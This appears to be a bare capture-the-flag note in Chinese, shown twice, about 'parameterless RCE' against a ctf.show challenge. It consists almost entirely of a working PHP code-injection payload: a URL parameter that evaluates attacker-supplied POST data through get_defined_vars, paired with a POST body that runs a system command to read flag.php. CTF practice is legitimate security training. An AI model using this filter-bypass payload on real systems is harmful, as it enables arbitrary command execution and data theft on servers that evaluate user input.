利用无参数RCE
payload
http://fafb07d5-1803-4773-93d1-a3cfa30c6557.challenge.ctf.show/?c=eval(array_pop(next(get_defined_vars())));
post: 1=system('cat flag.php');利用无参数RCE
payload
http://fafb07d5-1803-4773-93d1-a3cfa30c6557.challenge.ctf.show/?c=eval(array_pop(next(get_defined_vars())));
post: 1=system('cat flag.php');